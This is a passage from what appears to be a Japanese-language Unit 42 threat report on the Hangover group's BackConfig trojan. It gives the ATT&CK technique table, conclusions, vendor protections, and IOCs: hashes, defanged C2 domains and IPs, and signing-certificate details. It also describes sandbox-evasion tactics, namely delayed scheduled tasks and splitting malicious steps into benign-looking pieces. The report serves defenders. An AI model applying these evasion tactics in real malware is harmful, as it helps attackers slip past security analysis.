(\u624b\u98064)\u306e\u5b58\u5728\u3092\u78ba\u8a8d\u3057\u3001\u5b58\u5728\u3057\u3066\u3044\u305f\u5834\u5408\u306e\u307f\u52d5\u4f5c\u3092\u7d9a\u3051\u307e\u3059\u3002<\/li>\n<\/ol>\n<\/li>\n<\/ul>\n<p>\u6700\u7d42\u7684\u306b\u306f\u3001XLS\u304c2\u3064\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u30c7\u30a3\u30b9\u30af\u306b\u66f8\u304d\u8fbc\u3093\u3067\u3001\u305d\u306e1\u3064\u3067\u3042\u308bBAT\u30d5\u30a1\u30a4\u30eb\u304c\u3059\u3050\u306b\u3044\u304f\u3064\u304b\u306e\u30b7\u30b9\u30c6\u30e0\u8a2d\u5b9a\u3092\u5909\u66f4\u3057\u30012\u3064\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u305f\u3060\u3057\u3001\u3053\u306e\u52d5\u4f5c\u3060\u3051\u3067\u306f\u3001\u3053\u308c\u3089\u304c\u60aa\u610f\u306e\u3042\u308b\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u304b\u3069\u3046\u304b\u3092\u5224\u65ad\u3067\u304d\u306a\u3044\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u300220\u5206\u304c\u7d4c\u904e\u3057\u3066\u521d\u3081\u3066\u30bf\u30b9\u30af\u30b9\u30b1\u30b8\u30e5\u30fc\u30e9\u304cVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3092\u5b9f\u884c\u3057\u3066\u3001BackConfig\u30ed\u30fc\u30c0\u30fcEXE\u3092\u8d77\u52d5\u3057\u307e\u3059\u304c\u3001\u305d\u306e\u3068\u304d\u307e\u3067\u306b\u5206\u6790\u30b7\u30b9\u30c6\u30e0\u304c\u76e3\u8996\u3092\u3084\u3081\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<h3><a id=\"post-107263-attck\"><\/a>ATT&amp;CK<\/h3>\n<p>\u4ee5\u4e0b\u306e\u8868\u306b\u3001\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u3067\u8aac\u660e\u3057\u305f\u8907\u6570\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u95a2\u9023\u3059\u308bTTP\u3092\u793a\u3057\u307e\u3059\u3002<\/p>\n<table style=\"width: 100%; height: 696px;\">\n<tbody>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 24px;\"><strong><span style=\"font-family: georgia, palatino, serif; font-size: 12pt;\">\u6226\u8853<\/span><\/strong><\/td>\n<td style=\"width: 80.4969%; height: 24px;\"><strong>\u624b\u6cd5(Mitre ATT&amp;CK ID)<\/strong><\/td>\n<\/tr>\n<tr style=\"height: 56px;\">\n<td style=\"width: 18.5093%; height: 112px;\" rowspan=\"2\">\u6280\u8853\u60c5\u5831\u306e\u53ce\u96c6<\/td>\n<td style=\"width: 80.4969%; height: 56px;\">OSINT\u30c7\u30fc\u30bf\u30bb\u30c3\u30c8\u3068\u60c5\u5831\u306e\u53d6\u5f97(T1247)<\/td>\n<\/tr>\n<tr style=\"height: 56px;\">\n<td style=\"width: 80.4969%; height: 56px;\">\u30bd\u30fc\u30b7\u30e3\u30eb\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u306e\u5b9f\u65bd(T1249)<\/td>\n<\/tr>\n<tr style=\"height: 80px;\">\n<td style=\"width: 18.5093%; height: 80px;\">\u653b\u6483\u8005\u306e\u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3<\/td>\n<td style=\"width: 80.4969%; height: 80px;\">\u30b5\u30fc\u30c9\u30d1\u30fc\u30c6\u30a3\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306e\u4fb5\u5bb3\u306b\u3088\u308b\u914d\u4fe1\u652f\u63f4(T1312)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 48px;\" rowspan=\"2\">\u69cb\u7bc9\u6a5f\u80fd<\/td>\n<td style=\"width: 80.4969%; height: 24px;\">\u30ab\u30b9\u30bf\u30e0\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u4f5c\u6210(T1345)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u53d6\u5f97\/\u518d\u4f7f\u7528(T1346)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 24px;\">\u30b9\u30c6\u30fc\u30b8\u6a5f\u80fd<\/td>\n<td style=\"width: 80.4969%; height: 24px;\">\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\/\u30c4\u30fc\u30eb\u306e\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3001\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3001\u304a\u3088\u3073\u8a2d\u5b9a(T1362)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 24px;\">\u521d\u671f\u4fb5\u5bb3<\/td>\n<td style=\"width: 80.4969%; height: 24px;\">\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0 \u30ea\u30f3\u30af(T1192)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 48px;\" rowspan=\"2\">\u5b9f\u884c<\/td>\n<td style=\"width: 80.4969%; height: 24px;\">\u30e6\u30fc\u30b6\u30fc\u306b\u3088\u308b\u5b9f\u884c(T1204)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u5b9f\u884c\u306e\u60aa\u7528(T1203)<\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"width: 18.5093%; height: 48px;\">\u5b9f\u884c\u3001\u6c38\u7d9a\u5316<\/td>\n<td style=\"width: 80.4969%; height: 48px;\">\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af(T1053)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 96px;\" rowspan=\"4\">\u9632\u5fa1\u56de\u907f<\/td>\n<td style=\"width: 80.4969%; height: 24px;\">\u30b3\u30fc\u30c9\u7f72\u540d(T1116)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u30d5\u30a1\u30a4\u30eb\u307e\u305f\u306f\u60c5\u5831\u306e\u96e3\u8aad\u5316\u89e3\u9664\/\u30c7\u30b3\u30fc\u30c9(T1140)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u96a0\u3057\u30d5\u30a1\u30a4\u30eb\u3068\u96a0\u3057\u30c7\u30a3\u30ec\u30af\u30c8\u30ea(T1158)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u96e3\u8aad\u5316\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u307e\u305f\u306f\u60c5\u5831(T1027)<\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"width: 18.5093%; height: 48px;\">\u9632\u5fa1\u56de\u907f\u3001\u5b9f\u884c<\/td>\n<td style=\"width: 80.4969%; height: 48px;\">\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0(T1064)<\/td>\n<\/tr>\n<tr style=\"height: 48px;\">\n<td style=\"width: 18.5093%; height: 48px;\">\u9632\u5fa1\u56de\u907f\u3001\u6c38\u7d9a\u5316<\/td>\n<td style=\"width: 80.4969%; height: 48px;\">BITS\u30b8\u30e7\u30d6(T1197)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 18.5093%; height: 96px;\" rowspan=\"4\">\u30b3\u30de\u30f3\u30c9&amp;\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb<\/td>\n<td style=\"width: 80.4969%; height: 24px;\">\u4f7f\u7528\u983b\u5ea6\u306e\u9ad8\u3044\u30dd\u30fc\u30c8(T1043)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u6a19\u6e96\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u5c64\u30d7\u30ed\u30c8\u30b3\u30eb(T1071)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u6a19\u6e96\u6697\u53f7\u5316\u30d7\u30ed\u30c8\u30b3\u30eb(T1032)<\/td>\n<\/tr>\n<tr style=\"height: 24px;\">\n<td style=\"width: 80.4969%; height: 24px;\">\u30ea\u30e2\u30fc\u30c8 \u30d5\u30a1\u30a4\u30eb \u30b3\u30d4\u30fc(T1105)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>\u7d50\u8ad6<\/h2>\n<p>\u73fe\u5728\u6d3b\u52d5\u4e2d\u306eHangover\u30b0\u30eb\u30fc\u30d7(\u5225\u540dNeon\u3001Viceroy Tiger\u3001MONSOON)\u306f\u3001Unit 42\u304c\u628a\u63e1\u3057\u3066\u3044\u308b\u9650\u308a\u3067\u306f\u3001\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3057\u3066\u304a\u308a\u3001\u6587\u66f8\u307e\u305f\u306f\u653f\u5e9c\u767a\u884c\u306e\u30d5\u30a9\u30fc\u30e0\u3092\u542b\u3080\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u3092\u4f7f\u7528\u3057\u3066\u3001\u4fb5\u5bb3\u3055\u308c\u305fWeb\u30b5\u30a4\u30c8\u3092\u95b2\u89a7\u3059\u308b\u3088\u3046\u306b\u88ab\u5bb3\u8005\u3092\u8a98\u3044\u307e\u3059\u3002\u3053\u306e\u30b5\u30a4\u30c8\u306f\u3001BackConfig\u3068\u3044\u3046\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u5175\u5668\u5316\u3055\u308c\u305fExcel\u6587\u66f8\u3092\u63d0\u4f9b\u3057\u307e\u3059\u3002Unit 42\u306f\u3001\u307b\u307c\u4f8b\u5916\u306a\u304f\u3001\u30e6\u30fc\u30b6\u30fc\u306b\u3088\u308b\u5b9f\u884c\u3092\u5fc5\u8981\u3068\u3059\u308b\u5175\u5668\u5316\u3055\u308c\u305f\u6587\u66f8\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u306e\u3092\u78ba\u8a8d\u3057\u3066\u3044\u307e\u3059\u3002\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u30c1\u30a7\u30fc\u30f3\u306e\u3069\u306e\u90e8\u5206\u3082\u30e6\u30fc\u30b6\u30fc\u306b\u3088\u308b\u5b9f\u884c\u304c\u5fc5\u8981\u306a\u3044\u3088\u3046\u306b\u3057\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u4f7f\u7528\u3092\u78ba\u8a8d\u3057\u305f\u306e\u306f\u3001\u904e\u53bb6\u304b\u6708\u9593\u30671\u56de\u3060\u3051\u3067\u3059\u3002<\/p>\n<p>BackConfig\u306e\u4e00\u6b21\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u4e8c\u6b21\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u9032\u5316\u306b\u3088\u308a\u3001\u96e3\u8aad\u5316\u3092\u884c\u3046\u5834\u5408\u3068\u884c\u308f\u306a\u3044\u5834\u5408\u306e\u4e21\u65b9\u3067\u3001\u30b3\u30de\u30f3\u30c9\u306e\u5b9f\u884c\u3068\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u5c55\u958b\u306b\u8907\u6570\u306e\u65b9\u6cd5\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u306e\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u6700\u65b0\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u306f\u3001\u30bf\u30a4\u30df\u30f3\u30b0\u826f\u304f\u77ed\u671f\u9593\u3067\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u5c55\u958b\u3057\u3066\u6210\u529f\u78ba\u7387\u3092\u6700\u5927\u5316\u3059\u308b\u305f\u3081\u306b\u3001\u30e2\u30b8\u30e5\u30e9\u30fc\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3092\u4f7f\u7528\u3057\u3066\u30b3\u30fc\u30c9\u3092\u66f4\u65b0\u304a\u3088\u3073\u518d\u4f7f\u7528\u3057\u3084\u3059\u304f\u3057\u3066\u3044\u307e\u3059\u3002\u6700\u65b0\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c\u65b9\u6cd5\u306f\u3001\u30b0\u30eb\u30fc\u30d7\u304c\u3001\u60aa\u610f\u306e\u3042\u308b\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u305d\u308c\u305e\u308c\u304c\u6bd4\u8f03\u7684\u5b89\u5168\u306b\u898b\u3048\u308b\u584a\u306b\u5206\u5272\u3059\u308b\u3053\u3068\u306b\u3088\u3063\u3066\u3001\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u3084\u4ed6\u306e\u81ea\u52d5\u5206\u6790\u30b7\u30b9\u30c6\u30e0\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u308b\u3053\u3068\u3082\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h3>\u4fdd\u8b77<\/h3>\n<table>\n<tbody>\n<tr>\n<td><img  class=\"alignnone wp-image-107276 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/word-image-76.png\" alt=\"\" width=\"150\" height=\"122\" \/><\/td>\n<td>Cortex XDR\u306f\u3001SilverTerrier\u306e\u653b\u6483\u8005\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u3066\u3044\u308b\u3059\u3079\u3066\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3001\u304a\u3088\u3073\u30d5\u30a1\u30a4\u30eb\u30ec\u30b9\u653b\u6483\u304b\u3089\u30a8\u30f3\u30c9\u30dd\u30a4\u30f3\u30c8\u3092\u4fdd\u8b77\u3057\u307e\u3059\u3002<\/td>\n<\/tr>\n<tr>\n<td><img  class=\"alignnone wp-image-107278 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/word-image-77.png\" alt=\"\" width=\"150\" height=\"149\" \/><\/td>\n<td>WildFire\u00ae\u30af\u30e9\u30a6\u30c9\u30d9\u30fc\u30b9\u8105\u5a01\u5206\u6790\u30b5\u30fc\u30d3\u30b9\u306f\u3001\u3053\u308c\u3089\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u305f\u30b5\u30f3\u30d7\u30eb\u3092\u6b63\u78ba\u306b\u8b58\u5225\u3057\u307e\u3059\u3002<\/td>\n<\/tr>\n<tr>\n<td><img  class=\"alignnone wp-image-107280 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/word-image-78.png\" alt=\"\" width=\"150\" height=\"183\" \/><\/td>\n<td>\u8105\u5a01\u9632\u5fa1\u306f\u3001\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u5074\u3068\u30b5\u30fc\u30d0\u30fc\u5074\u306e\u65e2\u77e5\u306e\u8106\u5f31\u6027\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u3001\u304a\u3088\u3073Hangover\u653b\u6483\u8005\u304c\u4f7f\u7528\u3059\u308b\u30b3\u30de\u30f3\u30c9&amp;\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306b\u5bfe\u3059\u308b\u4fdd\u8b77\u3092\u63d0\u4f9b\u3057\u307e\u3059\u3002<\/td>\n<\/tr>\n<tr>\n<td><img  class=\"alignnone wp-image-107282 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/word-image-79.png\" alt=\"\" width=\"150\" height=\"192\" \/><\/td>\n<td>URL\u30d5\u30a3\u30eb\u30bf\u30ea\u30f3\u30b0\u306f\u3001Hangover\u653b\u6483\u8005\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u308b\u3059\u3079\u3066\u306e\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30c9\u30e1\u30a4\u30f3\u3068\u30de\u30eb\u30a6\u30a7\u30a2\u30c9\u30e1\u30a4\u30f3\u3092\u8b58\u5225\u3057\u3066\u3001Hangover\u653b\u6483\u8005\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u308b\u65b0\u3057\u3044\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u304c\u5175\u5668\u5316\u3055\u308c\u308b\u524d\u306b\u4e88\u9632\u7684\u306b\u30d5\u30e9\u30b0\u3092\u4ed8\u3051\u307e\u3059\u3002<\/td>\n<\/tr>\n<tr>\n<td><img  class=\"alignnone wp-image-107284 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/word-image-80.png\" alt=\"\" width=\"150\" height=\"150\" \/><\/td>\n<td>AutoFocus&#x2122;\u30b3\u30f3\u30c6\u30ad\u30b9\u30c8\u8105\u5a01\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u30b5\u30fc\u30d3\u30b9\u306e\u30e6\u30fc\u30b6\u30fc\u306f\u3001\u4ee5\u4e0b\u306e\u30bf\u30b0\u3092\u4f7f\u7528\u3057\u3066\u3053\u308c\u3089\u306e\u653b\u6483\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u305f\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u8868\u793a\u3067\u304d\u307e\u3059\u3002<br \/>\n<a href=\"https:\/\/autofocus.paloaltonetworks.com\/#\/tag\/Unit42.Hangover\">Hangover\u30b0\u30eb\u30fc\u30d7<\/a>\u3068<a href=\"https:\/\/autofocus.paloaltonetworks.com\/#\/tag\/Unit42.BackConfig\">BackConfig\u30de\u30eb\u30a6\u30a7\u30a2<\/a>\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001<a href=\"https:\/\/autofocus.paloaltonetworks.com\">AutoFocus\u306e\u30b5\u30a4\u30c8<\/a>\u3067\u78ba\u8a8d\u3067\u304d\u307e\u3059\u3002<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306f\u3001\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u306e\u30d5\u30a1\u30a4\u30eb\u30b5\u30f3\u30d7\u30eb\u3084IOC\u306a\u3069\u306e\u5f0a\u793e\u306e\u8abf\u67fb\u7d50\u679c\u3092\u3001\u63d0\u643a\u7d44\u7e54\u3067\u3042\u308bCyber Threat Alliance (\u30b5\u30a4\u30d0\u30fc\u8105\u5a01\u30a2\u30e9\u30a4\u30a2\u30f3\u30b9)\u306e\u30e1\u30f3\u30d0\u30fc\u3068\u5171\u6709\u3057\u3066\u3044\u307e\u3059\u3002CTA\u306e\u30e1\u30f3\u30d0\u30fc\u306f\u3001\u3053\u306e\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u3092\u4f7f\u7528\u3057\u3066\u3001\u9867\u5ba2\u306b\u8fc5\u901f\u306b\u4fdd\u8b77\u3092\u5c0e\u5165\u3057\u3001\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u8005\u3092\u4f53\u7cfb\u7684\u306b\u58ca\u6ec5\u3055\u305b\u307e\u3059\u3002Cyber Threat Alliance\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001<a href=\"https:\/\/www.cyberthreatalliance.org\/\">www.cyberthreatalliance.org<\/a>\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044<em>(\u3053\u308c\u306fCTA\u3068\u4e8b\u524d\u306b\u5171\u6709\u3057\u3066\u3044\u308b\u30d6\u30ed\u30b0\u306b\u8ffd\u52a0\u3055\u308c\u307e\u3059\u3002WordPress\u306b\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u9069\u5207\u306a\u30bf\u30a4\u30df\u30f3\u30b0\u3067\u8ffd\u52a0\u3055\u308c\u307e\u3059)\u3002<\/em><\/p>\n<h3><a id=\"post-107263-indicators-of-compromise\"><\/a>IOC<\/h3>\n<h4><a id=\"post-107263-delivery-documents\"><\/a><strong>\u914d\u4fe1\u6587\u66f8<\/strong><\/h4>\n<ul>\n<li>56349cf3188a36429c207d425dd92d8d57553b1f43648914b44965de2bd63dd6<\/li>\n<li>8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c<\/li>\n<li>021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b<\/li>\n<li>be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461<\/li>\n<li>0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf<\/li>\n<li>ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb<\/li>\n<li>752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f (CVE-2017-11882\u3092\u4f7f\u7528\u3059\u308bRTF)<\/li>\n<\/ul>\n<h4><a id=\"post-107263-batch-files\"><\/a><strong>\u30d0\u30c3\u30c1\u30d5\u30a1\u30a4\u30eb<\/strong><\/h4>\n<ul>\n<li>4BAFBF6000A003EB03F31023945A101813654D26B7F3E402D1F51B7608B93BCB (Audio.txt\/Naya Housing\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u304b\u3089\u6d41\u7528\u3057\u305f.bat)<\/li>\n<li>C94f7733fc9bdbcb503efd000e5aef66d494291ae40fc516bb040b0d1d8b46c9<\/li>\n<li>6a35d4158a5cb8e764777ba05c3d7d8a93a3865b24550bfb2eb8756c11b57be3<\/li>\n<li>750fc47d8aa8c9ae7955291b9736e8292f02aaaa4f8118015e6927f78297f580<\/li>\n<li>5292f4b4f38d41942016cf4b154b1ec65bb33dbc193a7e222270d4eea3578295<\/li>\n<li>f64dbcd8b75efe7f4fa0c2881f0d62982773f33dcfd77cccb4afc64021af2d9e<\/li>\n<li>98d27e830099c82b9807f19dcef1a25d7fce2c79a048d169a710b272e3f62f6e<\/li>\n<li>29c5dd19b577162fe76a623d9a6dc558cfbd6cddca64ed53e870fe4b66b44096 (driverkit.bat)<\/li>\n<li>abe82ffb8a8576dca8560799a082013a7830404bb235cb29482bc5038145b003 (Winmgt_Drive.bat\u306fbitsadmin\u3092\u4f7f\u7528)<\/li>\n<li>02c306bb120148791418136dcea8eb93f8e97fb51b6657fd9468c73fb5ea786c<\/li>\n<\/ul>\n<h4><a id=\"post-107263-vbs-files\"><\/a><strong>VBS\u30d5\u30a1\u30a4\u30eb<\/strong><\/h4>\n<ul>\n<li>87e8c46d065ace580b1ed28565d1fddaa6df49da1ba83f7b3e9982cd8a0013f1 (One_drivers.txt\/Naya Housing\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u304b\u3089\u6d41\u7528\u3057\u305f.vbs)<\/li>\n<li>952d4a9891a75e25e1c31a0514b97345ca0d8f240cdd4a57c8b3ff8a651a231a (Down_LinkLog.vbs)<\/li>\n<li>a1cd89a684db41206fc71efe327ef608652931e749c24a3232908824cea426bb (Winmgt.vbs\u306fBITS\u3092\u4f7f\u7528)<\/li>\n<\/ul>\n<h4><a id=\"post-107263-exe-payloads\"><\/a><strong>EXE\u30da\u30a4\u30ed\u30fc\u30c9<\/strong><\/h4>\n<ul>\n<li>306fe259a250b2f0d939322cfb97787c4076c357fc9eb1f1cc10b0060f27f644<\/li>\n<li>0f11fb955df07afc1912312f276c7fa3794ab85cd9f03b197c8bdbefb215fe92<\/li>\n<li>84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c<\/li>\n<li>18ce3eebbb093a218a8f566b579a5784caee94fadcda8f8c0d21f214ce2bd8b9<\/li>\n<li>922d6e68ecac6dbfdd1985c2fae43e2fc88627df810897e3068d126169977709<\/li>\n<li>4a4bc01b20dd2aaa2a2434dc677a44cc85d9533bed30bc58b8026b877db028d5<\/li>\n<li>677d4982d714bb47fab613ebe1921005509ed0d1e8965e7241994e38c3ade9f2<\/li>\n<li>d3013204f1a151c72879afc213dca3cada8c3ea617156b37771bdd7b7b74057f<\/li>\n<li>91c67c1cda67b60c82e14a5c32d79a4236f5a82136317162dfbde1a6054cf8c1<\/li>\n<li>de5b670656cbdbcf11607f01a6f93644765d9647ddab39b54946170b33f7ac9a<\/li>\n<li>f79ebf038c7731ea3a19628cb329cada4ebb18f17439d9c6cf19d361b0494e7b<\/li>\n<li>9e141fe67521b75412419a8c88c199c8ebd2a135c7a8b58edced454fbc33cb77<\/li>\n<li>6787242a810f8a5e1423e83790064a0a98954ab0802a90649fdd55a47d75695e<\/li>\n<li>e28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f<\/li>\n<li>07c97b253452a2a8eb7753ed8c333efeaa3546c005ffcfb5b3d71dc61c49abda<\/li>\n<li>31faeefb4dc4e54b747387bb54a5213118970ccb2f141559f8e2b4dbfdbeb848<\/li>\n<li>15109962da4899949863447bfdf6a6de87a8876f92adb7577392032df44ec892<\/li>\n<li>D87b875b8641c538f90fe68cad4e9bdc89237dba137e934f80996e8731059861<\/li>\n<li>167c7d7c08d318bc40e552e6e32715a869d2d62ba0305752b9b9bece6b9e337e<\/li>\n<li>4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd (\u904e\u53bb\u306e\u4e00\u9023\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u306e\u4f8b)<\/li>\n<li>b18697e999ed5859bfbc03e1d6e900752e1cdcd85ddb71729e2b38161366e5b5 (driverkit.zip)<\/li>\n<\/ul>\n<h4><a id=\"post-107263-infrastructure\"><\/a><strong>\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3<\/strong><\/h4>\n<ul>\n<li>linkrequest[.]live (23.106.123[.]87)<\/li>\n<li>matissues[.]com<\/li>\n<li>unique.fontsupdate[.]com<\/li>\n<li>185.203.119[.]184<\/li>\n<li>212.114.52[.]148<\/li>\n<\/ul>\n<h4><a id=\"post-107263-digital-signatures\"><\/a><strong>\u30c7\u30b8\u30bf\u30eb\u7f72\u540d<\/strong><\/h4>\n<p>\u4ee5\u4e0b\u306b\u793a\u3059\u81ea\u5df1\u7f72\u540d\u30c7\u30b8\u30bf\u30eb\u8a3c\u660e\u66f8\u306e\u30ea\u30b9\u30c8\u306f\u7db2\u7f85\u7684\u306a\u30ea\u30b9\u30c8\u3067\u306f\u306a\u304f\u3001\u904e\u53bb12\u304b\u6708\u9593\u306bBackConfig PE\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u78ba\u8a8d\u3055\u308c\u305f\u3082\u306e\u306b\u306e\u307f\u95a2\u9023\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h5><strong>Foxit:<\/strong><\/h5>\n<ul>\n<li>thumbprint: 79635cb32cf16cf6bddfd563b09d7aa99ccb2c01<\/li>\n<li>issuer: CN=Foxit Software Incorporated<\/li>\n<li>subject: CN=Foxit Software Incorporated<\/li>\n<li>version: 3<\/li>\n<li>algorithm: sha1WithRSAEncryption<\/li>\n<li>serial: 50:53:ce:ad:42:c2:70:84:4f:55:bc:76:a4:23:6c:c8<\/li>\n<li>valid from: 1\/1\/2018<\/li>\n<li>valid to: 1\/1\/2024<\/li>\n<\/ul>\n<h5><strong>Wind0ws:<\/strong><\/h5>\n<ul>\n<li>thumbprint: aa9010ff841c67cf8fb88d7f1e86a778b35bcba0<\/li>\n<li>issuer: CN=wind0ws<\/li>\n<li>subject: CN=wind0ws<\/li>\n<li>version: 3<\/li>\n<li>algorithm: sha1WithRSAEncryption<\/li>\n<li>serial: 88:de:2e:60:7f:48:2c:81:44:54:32:29:98:22:69:70<\/li>\n<li>valid from: 1\/1\/2019<\/li>\n<li>valid to: 